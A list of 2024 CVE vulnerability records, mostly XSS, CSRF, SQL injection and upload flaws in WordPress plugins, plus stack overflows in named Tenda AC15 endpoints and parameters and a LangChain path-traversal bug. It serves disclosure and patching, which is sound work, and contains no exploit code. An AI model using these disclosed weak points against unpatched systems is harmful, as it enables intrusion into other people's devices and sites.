CVE 2024 2809 Candidate A vulnerability, which was classified as critical, was found in Tenda AC15 15.03.05.18/15.03.20_multi. Affected is the function formSetFirewallCfg of the file /goform/SetFirewallCfg. The manipulation of the argument firewallEn leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257664. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257664 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257664 | MISC:VDB-257664 | Tenda AC15 SetFirewallCfg formSetFirewallCfg stack-based overflow | URL:https://vuldb.com/?id.257664 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formSetFirewallCfg.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formSetFirewallCfg.md Assigned (20240321)
CVE 2024 28089 Candidate Hitron CODA-4582 2AHKM-CODA4589 7.2.4.5.1b8 devices allow a remote attacker within Wi-Fi proximity (who has access to the router admin panel) to conduct a DOM-based stored XSS attack that can fetch remote resources. The payload is executed at index.html#advanced_location (aka the Device Location page). This can cause a denial of service or lead to information disclosure. MISC:https://github.com/actuator/cve/blob/main/Hitron/CVE-2024-28089 | MISC:https://github.com/actuator/cve/blob/main/Hitron/Hitron_DOM_XSS_POC.gif | MISC:https://github.com/actuator/cve/blob/main/Hitron/Hitron_DOM_XSS_POC_DOS_ALT.gif Assigned (20240304)
CVE 2024 28088 Candidate LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.) MISC:https://github.com/PinkDraconian/PoC-Langchain-RCE/blob/main/README.md | MISC:https://github.com/langchain-ai/langchain/blob/f96dd57501131840b713ed7c2e86cbf1ddc2761f/libs/core/langchain_core/utils/loading.py | MISC:https://github.com/langchain-ai/langchain/pull/18600 Assigned (20240303)
CVE 2024 28084 Candidate p2putil.c in iNet wireless daemon (IWD) through 2.15 allows attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact because of initialization issues in situations where parsing of advertised service information fails. FEDORA:FEDORA-2024-3fa713f2e0 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYRPQ3OLV3GGLUCDYWBHU34DLBLM62XJ/ | FEDORA:FEDORA-2024-4ef5edfb2a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KSGT4IZ23CJBOQA3AFYEMBJ5OHFZBMK/ | MISC:https://git.kernel.org/pub/scm/network/wireless/iwd.git/commit/?id=52a47c9fd428904de611a90cbf8b223af879684d | MISC:https://git.kernel.org/pub/scm/network/wireless/iwd.git/commit/?id=d34b4e16e045142590ed7cb653e01ed0ae5362eb Assigned (20240303)
CVE 2024 2808 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This issue affects the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257663. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257663 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257663 | MISC:VDB-257663 | Tenda AC15 QuickIndex formQuickIndex stack-based overflow | URL:https://vuldb.com/?id.257663 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formQuickIndex.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formQuickIndex.md Assigned (20240321)
CVE 2024 28070 Candidate A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack due to insufficient input validation. A successful exploit could allow an attacker to access sensitive information and gain unauthorized access. MISC:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0002 Assigned (20240301)
CVE 2024 2807 Candidate A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.20_multi. This vulnerability affects the function formExpandDlnaFile of the file /goform/expandDlnaFile. The manipulation of the argument filePath leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257662 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257662 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257662 | MISC:VDB-257662 | Tenda AC15 expandDlnaFile formExpandDlnaFile stack-based overflow | URL:https://vuldb.com/?id.257662 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formExpandDlnaFile.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formExpandDlnaFile.md Assigned (20240321)
CVE 2024 28069 Candidate A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct an information disclosure attack due to improper configuration. A successful exploit could allow an attacker to access sensitive information and potentially conduct unauthorized actions within the vulnerable component. MISC:https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0001 Assigned (20240301)
CVE 2024 2806 Candidate A vulnerability classified as critical has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This affects the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceId/deviceMac leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257661 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257661 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257661 | MISC:VDB-257661 | Tenda AC15 addWifiMacFilter stack-based overflow | URL:https://vuldb.com/?id.257661 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/addWifiMacFilter_deviceId.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/addWifiMacFilter_deviceId.md Assigned (20240321)
CVE 2024 28054 Candidate Amavis before 2.12.3 and 2.13.x before 2.13.1, in part because of its use of MIME-tools, has an Interpretation Conflict (relative to some mail user agents) when there are multiple boundary parameters in a MIME email message. Consequently, there can be an incorrect check for banned files or malware. FEDORA:FEDORA-2024-1d87055861 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6J2MK2CS3KNJOS66QLW2MBJ4PIDLWJP5/ | FEDORA:FEDORA-2024-3cf9eb64ba | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CDF6M3UXP45INVSWB4HXEDZH35CVZIJ4/ | FEDORA:FEDORA-2024-8bbcae6af2 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQQQQPTZ5JHXTUCYUXZHY6RZJ6VOGOAJ/ | MISC:https://gitlab.com/amavis/amavis/-/issues/112 | MISC:https://gitlab.com/amavis/amavis/-/raw/v2.13.1/README_FILES/README.CVE-2024-28054 | MISC:https://lists.amavis.org/pipermail/amavis-users/2024-March/006811.html | MISC:https://metacpan.org/pod/MIME::Tools | MISC:https://www.amavis.org/release-notes.txt Assigned (20240301)
CVE 2024 28053 Candidate Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240314)
CVE 2024 2805 Candidate A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been rated as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257660. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257660 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257660 | MISC:VDB-257660 | Tenda AC15 SetSpeedWan formSetSpeedWan stack-based overflow | URL:https://vuldb.com/?id.257660 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/SetSpeedWan.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/SetSpeedWan.md Assigned (20240321)
CVE 2024 28048 Candidate OS command injection vulnerability exists in ffBull ver.4.11, which may allow a remote unauthenticated attacker to execute an arbitrary OS command with the privilege of the running web server. Note that the developer was unreachable, therefore, users should consider stop using ffBull ver.4.11. MISC:https://jvn.jp/en/jp/JVN17176449/ | URL:https://jvn.jp/en/jp/JVN17176449/ Assigned (20240305)
CVE 2024 28045 Candidate Improper neutralization of input within the affected product could lead to cross-site scripting. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 28041 Candidate HGW BL1500HM Ver 002.001.013 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary command. MISC:https://jvn.jp/en/vu/JVNVU93546510/ | URL:https://jvn.jp/en/vu/JVNVU93546510/ | MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ | URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ Assigned (20240318)
CVE 2024 28040 Candidate SQL injection vulnerability exists in GetDIAE_astListParameters. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 28039 Candidate Improper restriction of XML external entity references vulnerability exists in FitNesse all releases, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition. MISC:http://fitnesse.org/FitNesseDownload | URL:http://fitnesse.org/FitNesseDownload | MISC:https://github.com/unclebob/fitnesse | URL:https://github.com/unclebob/fitnesse | MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | MISC:https://jvn.jp/en/jp/JVN94521208/ | URL:https://jvn.jp/en/jp/JVN94521208/ Assigned (20240306)
CVE 2024 28034 Candidate Cross-site scripting vulnerability exists in Mini Thread Version 3.33βi. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable, therefore, users should consider stop using Mini Thread Version 3.33βi. MISC:https://jvn.jp/en/jp/JVN40523785/ | URL:https://jvn.jp/en/jp/JVN40523785/ Assigned (20240305)
CVE 2024 28033 Candidate OS command injection vulnerability exists in WebProxy 1.7.8 and 1.7.9, which may allow a remote unauthenticated attacker to execute an arbitrary OS command with the privilege of the running web server. Note that the developer was unreachable, therefore, users should consider stop using WebProxy 1.7.8 and 1.7.9. MISC:https://jvn.jp/en/jp/JVN22376992/ | URL:https://jvn.jp/en/jp/JVN22376992/ Assigned (20240305)
CVE 2024 28029 Candidate Privileges are not fully verified server-side, which can be abused by a user with limited privileges to bypass authorization and access privileged functionality. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 27998 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager allows Reflected XSS.This issue affects Barcode Scanner with Inventory & Order Manager: from n/a through 1.5.3. MISC:https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-and-inventory-manager-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-and-inventory-manager-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27997 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Visualcomposer Visual Composer Website Builder allows Stored XSS.This issue affects Visual Composer Website Builder: from n/a through 45.6.0. MISC:https://patchstack.com/database/vulnerability/visualcomposer/wordpress-visual-composer-website-builder-landing-page-builder-custom-theme-builder-maintenance-mode-coming-soon-pages-plugin-45-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/visualcomposer/wordpress-visual-composer-website-builder-landing-page-builder-custom-theme-builder-maintenance-mode-coming-soon-pages-plugin-45-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27996 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Survey Maker team Survey Maker allows Stored XSS.This issue affects Survey Maker: from n/a through 4.0.5. MISC:https://patchstack.com/database/vulnerability/survey-maker/wordpress-survey-maker-plugin-4-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/survey-maker/wordpress-survey-maker-plugin-4-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27995 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Repute Infosystems ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup allows Stored XSS.This issue affects ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup: from n/a through 4.0.23. MISC:https://patchstack.com/database/vulnerability/armember-membership/wordpress-armember-plugin-4-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/armember-membership/wordpress-armember-plugin-4-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27994 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YITH YITH WooCommerce Product Add-Ons allows Reflected XSS.This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.5.0. MISC:https://patchstack.com/database/vulnerability/yith-woocommerce-product-add-ons/wordpress-yith-woocommerce-product-add-ons-plugin-4-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/yith-woocommerce-product-add-ons/wordpress-yith-woocommerce-product-add-ons-plugin-4-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27993 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Typps Calendarista Basic Edition.This issue affects Calendarista Basic Edition: from n/a through 3.0.2. MISC:https://patchstack.com/database/vulnerability/calendarista-basic-edition/wordpress-calendarista-basic-edition-plugin-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/calendarista-basic-edition/wordpress-calendarista-basic-edition-plugin-3-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27992 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Link Whisper Link Whisper Free allows Reflected XSS.This issue affects Link Whisper Free: from n/a through 0.6.8. MISC:https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27991 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SupportCandy allows Stored XSS.This issue affects SupportCandy: from n/a through 3.2.3. MISC:https://patchstack.com/database/vulnerability/supportcandy/wordpress-supportcandy-plugin-3-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/supportcandy/wordpress-supportcandy-plugin-3-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27990 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Moneytizer allows Stored XSS.This issue affects The Moneytizer: from n/a through 9.5.20. MISC:https://patchstack.com/database/vulnerability/the-moneytizer/wordpress-the-moneytizer-plugin-9-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/the-moneytizer/wordpress-the-moneytizer-plugin-9-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27989 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution WP Responsive Tabs horizontal vertical and accordion Tabs allows Stored XSS.This issue affects WP Responsive Tabs horizontal vertical and accordion Tabs: from n/a through 1.1.17. MISC:https://patchstack.com/database/vulnerability/responsive-horizontal-vertical-and-accordion-tabs/wordpress-wp-responsive-tabs-horizontal-vertical-and-accordion-tabs-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/responsive-horizontal-vertical-and-accordion-tabs/wordpress-wp-responsive-tabs-horizontal-vertical-and-accordion-tabs-plugin-1-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27988 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WEN Themes WEN Responsive Columns allows Stored XSS.This issue affects WEN Responsive Columns: from n/a through 1.3.2. MISC:https://patchstack.com/database/vulnerability/wen-responsive-columns/wordpress-wen-responsive-columns-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wen-responsive-columns/wordpress-wen-responsive-columns-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27987 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP Give allows Reflected XSS.This issue affects Give: from n/a through 3.3.1. MISC:https://patchstack.com/database/vulnerability/give/wordpress-give-plugin-3-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/give/wordpress-give-plugin-3-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27986 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Elementor Addons by Livemesh allows Stored XSS.This issue affects Elementor Addons by Livemesh: from n/a through 8.3.5. MISC:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27985 Candidate Deserialization of Untrusted Data vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.9. MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-9-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-9-php-object-injection-vulnerability?_s_id=cve Assigned (20240229)
CVE 2024 27974 Candidate Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc. may be altered. As for the details of affected product names, model numbers, and versions, refer to the information provided by the vendor listed under [References]. MISC:https://jvn.jp/en/jp/JVN34328023/ | URL:https://jvn.jp/en/jp/JVN34328023/ | MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_1_announce.html | URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_1_announce.html Assigned (20240228)
CVE 2024 27970 Candidate Missing Authorization vulnerability in BogdanFix WP SendFox.This issue affects WP SendFox: from n/a through 1.3.0. MISC:https://patchstack.com/database/vulnerability/wp-sendfox/wordpress-wp-sendfox-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-sendfox/wordpress-wp-sendfox-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27969 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Enhanced Free Downloads WooCommerce allows Stored XSS.This issue affects Free Downloads WooCommerce: from n/a through 3.5.8.2. MISC:https://patchstack.com/database/vulnerability/download-now-for-woocommerce/wordpress-free-downloads-woocommerce-plugin-3-5-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/download-now-for-woocommerce/wordpress-free-downloads-woocommerce-plugin-3-5-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27968 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Optimole Super Page Cache for Cloudflare allows Stored XSS.This issue affects Super Page Cache for Cloudflare: from n/a through 4.7.5. MISC:https://patchstack.com/database/vulnerability/wp-cloudflare-page-cache/wordpress-super-page-cache-for-cloudflare-plugin-4-7-5-cross-site-request-forgery-csrf-to-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-cloudflare-page-cache/wordpress-super-page-cache-for-cloudflare-plugin-4-7-5-cross-site-request-forgery-csrf-to-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27967 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Michael Leithold DSGVO All in one for WP.This issue affects DSGVO All in one for WP: from n/a through 4.3. MISC:https://patchstack.com/database/vulnerability/dsgvo-all-in-one-for-wp/wordpress-dsgvo-all-in-one-for-wp-plugin-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/dsgvo-all-in-one-for-wp/wordpress-dsgvo-all-in-one-for-wp-plugin-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27966 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ExpressTech Quiz And Survey Master allows Stored XSS.This issue affects Quiz And Survey Master: from n/a through 8.2.2. MISC:https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-8-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/quiz-master-next/wordpress-quiz-and-survey-master-plugin-8-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27965 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFunnels Team WPFunnels allows Stored XSS.This issue affects WPFunnels: from n/a through 3.0.6. MISC:https://patchstack.com/database/vulnerability/wpfunnels/wordpress-wpfunnels-plugin-3-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wpfunnels/wordpress-wpfunnels-plugin-3-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27964 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in Gesundheit Bewegt GmbH Zippy.This issue affects Zippy: from n/a through 1.6.9. MISC:https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-9-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-9-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27963 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crisp allows Stored XSS.This issue affects Crisp: from n/a through 0.44. MISC:https://patchstack.com/database/vulnerability/crisp/wordpress-crisp-live-chat-and-chatbot-plugin-0-44-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/crisp/wordpress-crisp-live-chat-and-chatbot-plugin-0-44-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27962 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Florian 'fkrauthan' Krauthan allows Reflected XSS.This issue affects wp-mpdf: from n/a through 3.7.1. MISC:https://patchstack.com/database/vulnerability/wp-mpdf/wordpress-wp-mpdf-plugin-3-7-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-mpdf/wordpress-wp-mpdf-plugin-3-7-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27961 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codekraft AntiSpam for Contact Form 7 allows Reflected XSS.This issue affects AntiSpam for Contact Form 7: from n/a through 0.6.0. MISC:https://patchstack.com/database/vulnerability/cf7-antispam/wordpress-antispam-for-contact-form-7-plugin-0-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/cf7-antispam/wordpress-antispam-for-contact-form-7-plugin-0-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27960 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution Email Subscription Popup allows Stored XSS.This issue affects Email Subscription Popup: from n/a through 1.2.20. MISC:https://patchstack.com/database/vulnerability/email-subscribe/wordpress-email-subscription-popup-plugin-1-2-20-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/email-subscribe/wordpress-email-subscription-popup-plugin-1-2-20-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27959 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9. MISC:https://patchstack.com/database/vulnerability/woosquare/wordpress-apiexperts-square-for-woocommerce-plugin-4-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woosquare/wordpress-apiexperts-square-for-woocommerce-plugin-4-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27958 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeisle Visualizer allows Reflected XSS.This issue affects Visualizer: from n/a through 3.10.5. MISC:https://patchstack.com/database/vulnerability/visualizer/wordpress-visualizer-plugin-3-10-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/visualizer/wordpress-visualizer-plugin-3-10-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27957 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in Pie Register.This issue affects Pie Register: from n/a through 3.8.3.1. MISC:https://patchstack.com/database/vulnerability/pie-register/wordpress-pie-register-plugin-3-8-3-1-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pie-register/wordpress-pie-register-plugin-3-8-3-1-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27956 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0. MISC:https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27953 Candidate Missing Authorization vulnerability in Cool Plugins Cryptocurrency Widgets – Price Ticker & Coins List.This issue affects Cryptocurrency Widgets – Price Ticker & Coins List: from n/a through 2.6.8. MISC:https://patchstack.com/database/vulnerability/cryptocurrency-price-ticker-widget/wordpress-cryptocurrency-widgets-plugin-2-6-8-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/cryptocurrency-price-ticker-widget/wordpress-cryptocurrency-widgets-plugin-2-6-8-broken-access-control-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27952 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Codeus Advanced Sermons allows Reflected XSS.This issue affects Advanced Sermons: from n/a through 3.2. MISC:https://patchstack.com/database/vulnerability/advanced-sermons/wordpress-advanced-sermons-plugin-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/advanced-sermons/wordpress-advanced-sermons-plugin-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27950 Candidate Missing Authorization vulnerability in sirv.Com Image Optimizer, Resizer and CDN – Sirv.This issue affects Image Optimizer, Resizer and CDN – Sirv: from n/a through 7.2.0. MISC:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-broken-access-control-vulnerability?_s_id=cve Assigned (20240228)
